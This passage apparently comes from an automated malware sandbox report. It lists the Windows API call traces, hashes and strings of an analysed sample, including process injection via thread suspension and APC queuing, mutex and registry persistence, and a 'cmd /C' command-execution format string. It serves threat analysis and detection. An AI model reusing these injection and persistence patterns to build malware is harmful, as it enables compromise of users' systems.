  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
